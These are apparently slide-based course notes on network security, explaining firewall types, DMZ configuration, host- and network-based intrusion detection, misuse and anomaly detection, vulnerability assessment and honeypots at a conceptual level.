Unit -4:Firewall & Intrusion Detection System Total Marks-18
Topics and Sub-topics
4.1 Firewall : Need of Firewall, Types of Firewall-Packet filters,
Statefull Packet Filters, Application Gateways, Circuit Gateways.
4.2 Firewall Policies, configuration, limitations, DMZ
4.3 Intrusion Detection System: Vulnerability Assessment, Misuse
detection, Anomaly Detection, Network Based IDS, Host Based
IDS, Honeypots.
4.1 Firewall:
• A Firewall is a network security device either hardware or software-based that
monitors and filters incoming and outgoing network traffic based on an
organization’s previously established security policies.
• It accepts, rejects or drops that specific traffic.
• Accept : allow the traffic Reject : block the traffic but reply with an “unreachable
error” Drop : block the traffic with no reply.
• A firewall establishes a barrier between secured internal networks and outside
untrusted network, such as the Internet.
• A firewall’s main purpose is to allow non-threatening traffic in and to keep
dangerous traffic out.
4.1.1 Need of Firewall:
• Connectivity to the Internet is no longer optional for organizations.
• However, accessing the Internet provides benefits to the organization; it also
enables the outside world to interact with the internal network of the
organization. This creates a threat to the organization.
• In order to secure the internal network from unauthorized traffic, we need a
Firewall.
4.1.2 Types of Firewall:
• List of types of firewall:
1. Packet filter as a firewall
2. Hardware Firewall
3. Software Firewall
4. Circuit level gateway firewall
5. Application level gateway firewall
6. Proxy server as a firewall
1. Packet Filtering Firewall
• A firewall works as a barrier, or a shield, between your PC and cyber space.
• When you are connected to the Internet, you are constantly sending and receiving
information in small units called packets.
• The firewall filters these packets to see if they meet certain criteria set by a series
of rules, and thereafter blocks or allows the data.
• This way, hackers cannot get inside and steal information such as bank account
1. Packet Filter Firewall: Continue….
1. Packet Filter Firewall:
• Working:-
1. A packet filtering router firewall applies a set of rules to each packet and based on
outcome, decides to either forward or discard the packet.
2. Such a firewall implementation involves a router, which is configured to filter packets
going in either direction i.e. from the local network to the outside world and vice versa.
3. A packet filter performs the following functions.
a. Receive each packet as it arrives.
b. Pass the packet through a set of rules, based on the contents of the IP and
transport header fields of the packet. If there is a match with one of the set rule,
decides whether to accept or discard the packet based on that rule.
c. If there is no match with any rule, take the default action. It can be discard all
packets or accept all packets.
• Advantages: simplicity, transparency to the users, high speed
• Disadvantages: difficult to set up packet filtering rules, lack of authentication.
2. Stateful Inspection Firewall:
• Stateful firewalls (performs Stateful Packet Inspection) are able to determine the
connection state of packet, unlike Packet filtering firewall, which makes it more
efficient.
• It keeps track of the state of networks connection travelling across it, such as TCP
streams. So the filtering decisions would not only be based on defined rules, but also
on packet’s history in the state table.
3. Circuit level gateway Firewalls:
• A circuit-level gateway firewall helps in providing the security between UDP and
TCP using the connection.
• It also acts as a handshaking device between trusted clients or servers to
untrusted hosts and vice versa.
• Generally, these circuit-level gateways work at the session layer of the OSI
model. To determine whether the session request is confirmed or not by the
circuit-level gateway is with the help of handshaking between packets.
3. Circuit level gateway Firewalls: Continue…..
• The information that passes to a remote computer with the help of a circuit-level
gateway appears as it is initiated from the gateway. This is everything because of
information hiding in protected networks. Circuit Level gateways are not
expensive.
• For defining a valid session in Circuit Level Gateway the component used are:-
• The Destination addresses, Source addresses, and Ports.
• The time of delay.
• The protocol is being utilized.
• The user and the password.
3. Circuit level gateway Firewalls: Continue…..
• Working:
• This circuit-level gateway setup can be done with the help of two TCP connections
, establishing the connection between the gateway and inner host TCP and outer
host of TCP users.
• After the connection establishment of the inner and outer host, the Gateway
transmits the TCP segments from one to another without bothering about the
contents.
• The circuit-level gateway maintains a table that helps in validating the
connections and checks which network packets contain data to pass, whenever a
network packet information matches an entry in the virtual circuit table. When
the firewall terminates the connection, it tries to remove that entry in the table
and the virtual-circuit connection between two nodes is closed.
• In the Circuit Level Gateway, once a session is permitted no further checks at the
level of individual packets are executed.
4. Application level gateway Firewalls:
• Application-level gateway is also called a bastion host. It operates at the application level.
Multiple application gateways can run on the same host but each gateway is a separate
server with its own processes.
• These firewalls, also known as application proxies, provide the most secure type of data
connection because they can examine every layer of the communication, including the
application data.
• Example: Consider FTP service. The FTP commands like getting the file, putting the file,
listing files, and positioning the process at a particular point in a directory tree. Some
system admin blocks put command but permits get command, list only certain files, or
prohibit changing out of a particular directory. The proxy server would simulate both sides
of this protocol exchange. For example, the proxy might accept get commands and reject
put commands.
4. Application level gateway Firewalls: Continue….
• It works as follows:
Step-1: User contacts the application gateway using a TCP/IP application such as
HTTP.
Step-2: The application gateway asks about the remote host with which the user
wants to establish a connection. It also asks for the user id and password that is
required to access the services of the application gateway.
Step-3: After verifying the authenticity of the user, the application gateway accesses
the remote host on behalf of the user to deliver the packets.
4. 1.3 Limitations of Firewall:
1. Complexity: Setting up and keeping up a firewall can be time-consuming and
difficult, especially for bigger networks or companies with a wide variety of
users and devices.
2. Limited Visibility: Firewalls may not be able to identify or stop security risks
that operate at other levels, such as the application or endpoint level, because
they can only observe and manage traffic at the network level.
3. False sense of security: Some businesses may place an excessive amount of
reliance on their firewall and ignore other crucial security measures like endpoint
security or intrusion detection systems.
4. Limited adaptability: Because firewalls are frequently rule-based, they might
not be able to respond to fresh security threats.
5. Performance impact: Network performance can be significantly impacted by
firewalls, particularly if they are set up to analyze or manage a lot of traffic.
4. 1.3 Limitations of Firewall: Continue….
6. Limited scalability: Because firewalls are only able to secure one network,
businesses that have several networks must deploy many firewalls, which can be
expensive.
7. Limited VPN support: Some firewalls might not allow complex VPN features
like split tunneling, which could restrict the experience of a remote worker.
8. Cost: Purchasing many devices or add-on features for a firewall system can be
expensive, especially for businesses.
4.2 DMZ (Demilitarized zone)
• It is a computer host or a small network inserted as a neutral zone between
company’s private network and outside public network. It prevents direct Access
to a server that has company data.
4.2 DMZ (Demilitarized zone) Continue……
• It avoids outside users from getting direct access to a company’s data server.
• A DMZ is an optional but more secure approach to a firewall. It can effectively acts as a
proxy server.
• The typical DMZ configuration has a separate computer or host in network which
receives requests from users within the private network to access a web sites or public
network.
• Then DMZ host initiates sessions for such requests on the public network but it is not
able to initiate a session back into the private network. It can only forward packets
which have been requested by a host.
• The public network’s users who are outside the company can access only the DMZ
host. It can store the company’s web pages which can be served to the outside users.
• Hence, the DMZ can’t give access to the other company’s data. By any way, if an
outsider penetrates the DMZ’s security the web pages may get corrupted but other
company’s information can be safe.
4.3.1 Intrusion Detection System(IDS):
• An IDS (Intrusion detection system) is intrusion detection system is process of
monitoring the events occurring in computer system or network & analyzing
them for signs of possible incident which are threats of computer security.
• Intrusion detection system (IDS) is a device or software application that monitors
network or system activities for malicious activities or policy violations and
produces reports to a management station.
• IDS come in a variety of “flavors” and approach the goal of detecting suspicious
traffic in different ways.
• Figure Intrusion Detection System
4.3.1 Intrusion Detection System(IDS): Continue……
• IDS have following logical components:
1. Traffic collection: collects activity as events from IDS to examine. On Host-based
IDS, this can be log files, Audit logs or traffic coming to or leaving a system.
• On network based IDS, this is typically a mechanism for copying traffic of
network link
2. Analysis Engine: examines collected network traffic & compares it to known
patterns of suspicious or malicious activity stored in digital signature. The analysis
engine act like a brain of IDS.
3. Signature database: a collection of patterns & definitions‟ of known suspicious or
malicious activity.
4. User Interface & Reporting: interfaces with human element, providing alerts
when suitable & giving the user a means to interact with & operate the IDS.
4.3.1 Intrusion Detection System(IDS): Continue……
• IDS are mainly divided into two categories, depending on monitoring activity:
1) Host-based IDS: Host based IDS looks for certain activities in the log files are:
1. Logins at odd hours
2. Login authentication failure
3. Adding new user account
4. Modification or access of critical systems files.
5. Modification or removal of binary files
6. Starting or stopping processes.
7. Privilege escalation
8. Use of certain program
2) Network based IDS: Network based IDS looks for certain activities like:
1. Denial of service attacks.
2. Port scans or sweeps
3. Malicious contents in the data payload of packet(s)
4. Vulnerability of scanning
5. Trojans, Viruses or worms
6. Tunneling
7. Brute force attacks.
4.3.2 Types of Intrusion Detection System(IDS):
1. Network Intrusion Detection System (NIDS):
• Network intrusion detection systems (NIDS) are set up at a planned point within
the network to examine traffic from all devices on the network.
• It performs an observation of passing traffic on the entire subnet and matches
the traffic that is passed on the subnets to the collection of known attacks. Once
an attack is identified or abnormal behavior is observed, the alert can be sent to
the administrator.
• An example of a NIDS is installing it on the subnet where firewalls are located in
order to see if someone is trying to crack the firewall.
• Figure :NIDS
Network Intrusion Detection System (NIDS):
• Advantages of Network-based Intrusion Detection Systems
• The deployment of network-based IDSs is usually easy with minimal effort.
• Network-based IDSs can be made very secure and is often invisible to most
attackers.
• They can monitor a heterogeneous set of hosts and operating systems
simultaneously, due to the fact that standard network protocols (e.g. TCP, UDP
and IP) are supported and used by most major operating systems.
• Disadvantages of Network-based Intrusion Detection Systems
• Network-based IDSs cannot analyze encrypted information. This problem is
increasing as more organizations and attackers use virtual private networks, which
normally utilize encrypted information.
• The processing load in a large or busy network may cause significant difficulties to
the analysis engine part of the IDS. This condition (high processing load) can
seriously limit an IDS’s ability to detect attacks when the network load is above a
specific amount of network traffic. Although some vendors have adopted
hardware-based solutions for IDSs, to increase the speed of their processing
capability (and the cost of implementation), the limitation still remains.
• The need to analyze packets as fast as possible, force developers to detect fewer
attacks. Thus, the detection effectiveness is often compromised for the sake of cost
effectiveness.
2. Host Based Intrusion Detection System (HIDS):
• Host intrusion detection systems (HIDS) run on independent hosts or devices on the
network.
• A HIDS monitors the incoming and outgoing packets from the device only and will alert the
administrator if suspicious or malicious activity is detected.
• It takes a snapshot of existing system files and compares it with the previous snapshot. If
the analytical system files were edited or deleted, an alert is sent to the administrator to
investigate.
• An example of HIDS usage can be seen on mission-critical machines, which are not
expected to change their layout.
• HIDS is looking for certain activities in the log file are:
• Logins at odd hours
• Login authentication failure
• Adding new user account
• Modification or access of critical system files
• Modification or removal of binary files
• Starting or stopping processes
• Privilege escalation
• Use of certain programs
2. Host Based Intrusion Detection System (HIDS):
• Figure : HIDS
• Advantages:
1. Operating System specific and detailed signatures.
2. Examine data after it has been decrypted.
3. Application specific.
4. Determine whether or not an alarm may impact that specific.
• Disadvantages:
1. Should have a process on every system to watch.
2. High cost of ownership and maintenance.
3. Uses local system resources.
4. If logged locally, could be compromised or disable.
4.3.3 Vulnerability Assessment:
• A vulnerability assessment is a systematic review of security weaknesses in an
information system.
• It evaluates if the system is susceptible to any known vulnerabilities, assigns
severity levels to those vulnerabilities, and recommends remediation or
mitigation, if and whenever needed.
• Examples of threats that can be prevented by vulnerability assessment include:
1. SQL injection, XSS and other code injection attacks.
2. Escalation of privileges due to faulty authentication mechanisms.
3. Insecure defaults – software that ships with insecure settings, such as a guessable
admin passwords.
4.3.3 Vulnerability Assessment: Continue….
• There are several types of vulnerability assessments. These include:
1. Host assessment – The assessment of critical servers, which may be vulnerable
to attacks if not adequately tested or not generated from a tested machine image.
2. Network and wireless assessment – The assessment of policies and practices
to prevent unauthorized access to private or public networks and network-
accessible resources.
3. Database assessment – The assessment of databases or big data systems for
vulnerabilities and misconfigurations, identifying rogue databases or insecure
dev/test environments, and classifying sensitive data across an organization’s
infrastructure.
4. Application scans – The identifying of security vulnerabilities in web applications
and their source code by automated scans on the front-end or static/dynamic
analysis of source code.
4.3.4 Misuse or signature detection:
• Misuse detection, also called signature detection, is an approach in which attack
patterns or unauthorized and suspicious behaviors are learned based on past
activities and then the knowledge about the learned patterns is used to detect or
predict subsequent similar such patterns in a network.
• The attack or misuse patterns, which are also called signatures, include patterns
of log files or data packets that were found to be malicious and identified as
threats to the network and the computing hosts.
• Each log file consists of its own signature that exhibits a unique pattern consisting
of binary bits 0 and 1. For intrusion detection systems protecting host computers,
that is, for host-based intrusion detection systems (HIDSs), the attack signature
databases may contain various patterns of system calls that represent a different
attack on the host.
4.3.4 Misuse or signature detection: Continue……
• In the case of a network-based intrusion detection system (NIDS), attack
signatures reveal specific patterns in data packets.
• These patterns may include signatures of the data payload, the packet header,
unauthorized activities, such as improper file transfer protocol (FTP) initiation, or
failed login attempt in Telnet.
• A typical data packet includes several fields such as: (i) the source IP address, (ii)
the destination IP address, (iii) the source port number for TCP or UDP, (iv) the
destination port number for TCP or UDP, (v) the protocol description such as UDP,
TCP or Internet control message protocol (ICMP), and (vi) the data payload. An
attack signature can be detected in any specific field, or in any combination of
these fields.
4.3.4 Misuse or signature detection: Continue……
• Figure shows how a typical misuse or signature detection system works. These
detection systems execute algorithms that attempt to match learned patterns or
signatures from past attacks with the current activities in a network in order to
detect any possible attack or malicious activities.
• If the signature of any current activity in the network matches with the signature
of any activity in the attack signature database, the detection system raises an
alert. A module in the detection system initiates a further investigation of the
attack and starts invoking appropriate security modules to defend against such
attacks. If the attack is found to be a real attack and not a false alarm by the
detection system, the existing database of the attack signatures is updated with
the signature of the new attack.
• For example, if the signature of an attack is: login name = “Sidra,” then, whenever
there is any attempt to login into any device in the network with the name
“Sidra,” the signature detection system will raise an alert of an attack.
4.3.4 Misuse or signature detection: Continue……
• Figure 1. Working of misuse or signature detection: Illustration of “if-else” rules.
4.3.5 Anomaly Detection:
• When a novel attack is launched on a network, misuse detection systems cannot
detect the attack as the attack signature is not present in the existing database of
attack signatures.
• However, an anomaly detection system has the ability to detect new and unseen
attacks and raise an early alarm before any substantial damage to the network
could be done by the attack.
• Like the misuse detection approach, anomaly detection relies on determining a
clear boundary between the normal and the anomalous traffic. The profile of the
normal behavior is assumed to be significantly different from that of the
anomalous behavior. The profile of the normal events and the normal traffic
should preferably satisfy a set of criteria in the sense that it must contain a very
clearly defined normal behavior.
4.3.5 Anomaly Detection: Continue……
• Figure shows the schematic diagram of a typical anomaly detection system.
Anomaly detection systems broadly work in the five steps:
(i) data collection,
(ii) data preprocessing,
(iii) normal behavior learning phase,
(iv) identification of misbehaviors using dissimilarity detection techniques and
(v) security responses.
• In a large-scale network, the data collection phase involves a large volume of data
to be collected from the network. In the data preprocessing phase, the volume of
data is reduced as this step includes feature selection, feature extraction, and
finally dimensionality reduction processes.
4.3.5 Anomaly Detection: Continue……
• Figure: Sequence of execution of modules in an anomaly detection system.
4.3.6 Difference Between Misuse Detection and
Anomaly Detection:
4.3.7 Honeypot:
• Honeypots are designed to purposely engage and deceive hackers and identify
malicious activities performed over the Internet.
• Honeypot is a network-attached system used as a trap for cyber-attackers to
detect and study the tricks and types of attacks used by hackers.
• The honeypot is designed to do the following:
1. Divert the attention of potential attacker.
2. Collect information about the intruder’s action.
3. Provide encouragement to the attacker so as to stay for some time, allowing
the administrations to detect this and swiftly act on this.
• Honeypots are designed for 2 important goals :
1. Make them look-like full real-life systems.
2. Do not allow legitimate users to know about or access them.
Figure shows Honeypot deployed independently:
4.3.7.1 Types of Honeypot:
• Honeypots are classified based on their deployment and the involvement of the intruder.
• Based on their deployment, honeypots are divided into :
1. Research honeypots- These are used by researchers to analyze hacker attacks and
deploy different ways to prevent these attacks.
2. Production honeypots- Production honeypots are deployed in production networks
along with the server. These honeypots act as a frontend trap for the attackers,
consisting of false information and giving time to the administrators to improve any
vulnerability in the actual system.
• Based on interaction, honeypots are classified into:
1. Low interaction honeypots: Low interaction honeypots gives very little insight
and control to the hacker about the network.
• It simulates only the services that are frequently requested by the attackers. The main
operating system is not involved in the low interaction systems and therefore it is less
risky.
4.3.7.1 Types of Honeypot: Continue……
• They require very fewer resources and are easy to deploy.
• The only disadvantage of these honeypots lies in the fact that experienced hackers
can easily identify these honeypots and can avoid it.
2. Medium Interaction Honeypots: Medium interaction honeypots allows more
activities to the hacker as compared to the low interaction honeypots.
• They can expect certain activities and are designed to give certain responses
beyond what a low-interaction honeypot would give.
3. High Interaction honeypots: A high interaction honeypot offers a large no. of
services and activities to the hacker, therefore, wasting the time of the hackers
and trying to get complete information about the hackers.
• These honeypots involve the real-time operating system and therefore are
comparatively risky if a hacker identifies the honeypot.
• High interaction honeypots are also very costly and are complex to implement. But
it provides us with extensively large information about hackers.
4.3.7.2 Advantages of Honeypot:
1. Acts as a rich source of information and helps collect real-time data.
2. Identifies malicious activity even if encryption is used.
3. Wastes hackers’ time and resources.
4. Improves security.
4.3.7.3 Disadvantages of honeypot:
5. Being distinguishable from production systems, it can be easily identified by
experienced attackers.
6. Having a narrow field of view, it can only identify direct attacks.
7. A honeypot once attacked can be used to attack other systems.